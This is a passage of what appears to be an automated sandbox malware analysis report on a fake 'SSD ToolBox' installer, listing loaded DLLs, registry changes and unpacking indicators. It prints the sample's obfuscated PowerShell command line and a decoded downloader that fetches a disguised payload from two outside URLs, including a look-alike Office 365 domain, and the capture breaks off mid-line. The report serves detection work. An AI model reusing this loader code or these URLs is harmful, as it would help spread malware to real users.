                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: webio.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpWindow found: window name: TMainFormJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SSD ToolBox_is1Jump to behavior
                            Source: soft.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: soft.exeStatic file information: File size 4996096 > 1048576
                            Source: soft.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x23e000
                            Source: soft.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x223000
                            Source: soft.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: Binary string: msvcp100.i386.pdb source: is-21QH6.tmp.12.dr
                            Source: Binary string: msvcr100.i386.pdb source: is-HP0G4.tmp.12.dr
                            Source: Binary string: wextract.pdb source: MnzBi21FK.exe, 0000000E.00000000.1827835811.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe, 0000000E.00000002.1849429216.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe.9.dr, UNIQ[1].file.9.dr
                            Source: Binary string: wextract.pdbGCTL source: MnzBi21FK.exe, 0000000E.00000000.1827835811.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe, 0000000E.00000002.1849429216.00007FF7444E9000.00000002.00000001.01000000.0000000D.sdmp, MnzBi21FK.exe.9.dr, UNIQ[1].file.9.dr
                            Source: Binary string: BitLockerToGo.pdb source: soft.exe, 00000005.00000002.1724312184.000000000A004000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: BitLockerToGo.pdbGCTL source: soft.exe, 00000005.00000002.1724312184.000000000A004000.00000004.00001000.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            Detected unpacking (changes PE section rights)
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeUnpacked PE file: 13.2.ssdtoolbox.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                            Detected unpacking (overwrites its own PE header)
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeUnpacked PE file: 13.2.ssdtoolbox.exe.400000.0.unpack
                            Found suspicious powershell code related to unpacking or dynamic code loading
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@
                            Suspicious powershell command line found
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = 